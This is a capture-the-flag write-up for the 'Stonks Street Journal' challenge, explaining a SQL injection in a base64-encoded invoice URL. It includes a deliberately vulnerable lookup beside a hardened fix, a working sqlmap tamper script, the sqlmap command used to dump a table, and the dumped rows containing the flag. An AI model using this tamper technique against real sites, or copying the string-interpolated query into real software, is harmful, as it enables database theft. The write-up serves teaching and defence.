Stonks Street Journal

Solution

After signing up on the website, we can view our invoice. The invoice URL is of the form /legacy_invoice_system/BASE64_ENCODED_STRING, and the base64-encoded string decodes to USERNAME-YEAR-MONTH-DAY.
Appending a ' to the end of the username yielded an SQL error:
```
syntax error at or near "2021"
LINE 1: ...riber WHERE username='zeyu2001'' AND signup_date='2021-11-27...
                                                             ^
```
It appears that the decoded string is split into the username and signup date, and both are interpolated into the SQL query without any sanitization or parameter binding.
We can use a custom sqlmap tamper script that appends the payload to the end of the signup date and then base64-encodes the entire string, so that it fits the custom injection point marked with * at GET /legacy_invoice_system/* in the saved request file.
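To make the bug concrete, the following is an added example (not code from the challenge or from the original writeup) of a minimal invoice lookup written the way the error message suggests the site does it, next to a hardened version. It uses an in-memory SQLite database standing in for the site's backend, an assumed `subscriber` table with the `username` and `signup_date` columns seen in the error, and an assumed `USERNAME-YYYY-MM-DD` token grammar; `make_db`, `make_token`, `lookup_vulnerable`, `parse_token`, `lookup_parameterized`, `lookup_hardened` and `probe` are all names made up for this example.

```python
import base64
import binascii
import re
import sqlite3
from datetime import date


def make_db():
    """Constructed in-memory stand-in for the site's subscriber table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscriber (username TEXT, signup_date TEXT)")
    conn.execute("INSERT INTO subscriber VALUES ('zeyu2001', '2021-11-27')")
    conn.commit()
    return conn


def make_token(username, signup_date):
    """Build the /legacy_invoice_system/<token> segment: base64(USERNAME-YEAR-MONTH-DAY)."""
    return base64.b64encode(f"{username}-{signup_date}".encode()).decode()


def lookup_vulnerable(conn, token):
    """The pattern implied by the error message: split the decoded token on the
    first '-' and interpolate both halves straight into the SQL text."""
    raw = base64.b64decode(token).decode()
    username, signup_date = raw.split("-", 1)
    query = ("SELECT username, signup_date FROM subscriber "
             f"WHERE username='{username}' AND signup_date='{signup_date}'")
    return conn.execute(query).fetchall()


# Assumed token grammar: a short alphanumeric username, then an ISO date.
TOKEN_RE = re.compile(r"([A-Za-z0-9_]{1,32})-(\d{4})-(\d{2})-(\d{2})")


def parse_token(token):
    """Decode and validate the token, rejecting anything that is not a
    well-formed USERNAME-YYYY-MM-DD string before it gets near the database."""
    try:
        raw = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("token is not valid base64") from exc
    match = TOKEN_RE.fullmatch(raw)
    if match is None:
        raise ValueError("token does not match USERNAME-YYYY-MM-DD")
    username, year, month, day = match.groups()
    # date() raises ValueError on impossible dates such as 2021-13-40.
    signup_date = date(int(year), int(month), int(day)).isoformat()
    return username, signup_date


def lookup_parameterized(conn, username, signup_date):
    """The actual fix: bind values as parameters so the driver never parses them as SQL."""
    return conn.execute(
        "SELECT username, signup_date FROM subscriber WHERE username=? AND signup_date=?",
        (username, signup_date),
    ).fetchall()


def lookup_hardened(conn, token):
    """Input validation plus parameterization: two layers, each sufficient on its own."""
    username, signup_date = parse_token(token)
    return lookup_parameterized(conn, username, signup_date)


def probe(lookup, conn, token):
    """Run one lookup and classify the outcome so the two code paths can be compared."""
    try:
        return ("rows", lookup(conn, token))
    except sqlite3.OperationalError:
        return ("sql_error", None)   # the stray quote broke the statement
    except ValueError:
        return ("rejected", None)    # the hardened parser refused the token


if __name__ == "__main__":
    db = make_db()
    for tok in (make_token("zeyu2001", "2021-11-27"), make_token("zeyu2001'", "2021-11-27")):
        print(tok, probe(lookup_vulnerable, db, tok), probe(lookup_hardened, db, tok))
```

With the legitimate token both lookups return the same row; with a single quote appended to the username the vulnerable path raises a database syntax error (the SQLite equivalent of the PostgreSQL-style message above), while the hardened path rejects the token before any query is built. `lookup_parameterized` alone, fed the quoted username directly, simply returns no rows, which is the behaviour a fix needs even without the extra validation.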
```python
import base64

from lib.core.enums import PRIORITY

# Define the order in which this tamper script is applied to the payload
__priority__ = PRIORITY.NORMAL


def tamper(payload, **kwargs):
    # sqlmap hands us the bare injection payload. Prepend the legitimate
    # USERNAME-YEAR-MONTH-DAY prefix so the payload lands after the signup
    # date, then base64-encode the whole string as the invoice URL expects.
    retVal = base64.b64encode(('zeyu2001-2021-11-27' + payload).encode()).decode()
    return retVal
```
Running sqlmap -r invoice.req --tamper tamper.py --threads 10 -T news_article --dump, we can dump the news_article table, which contains the flag.
```
Database: public
Table: news_article
[4 entries]
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
| id | text | headline | publish_time |
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
| 1 | My most favourite flag was: CSR{welc0me_0n_b0ard} | Flags are sometimes hard to find, but always beautiful | 2021-11-26 08:33:33.159482+00 |
| 2 | <blank> | Elin [Nordegren] said I was obsessed with golf, but when I started sleeping with other women, that wasn’t good enough either. | 2021-11-26 08:33:33.166128+00 |
| 3 | <blank> | Struggling to stay on their feet as they stood outside their assigned polling place, the nine members of the U.S. Supreme Court reportedly | 2021-11-26 08:33:33.16646+00 |
| 4 | <blank> | Former U.S. secretary of defense Donald Rumsfeld passed away Wednesday at 88 years old, sources confirmed, and is survived by 1 million fewer Iraqis. | 2021-11-26 08:33:33.166761+00 |
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
```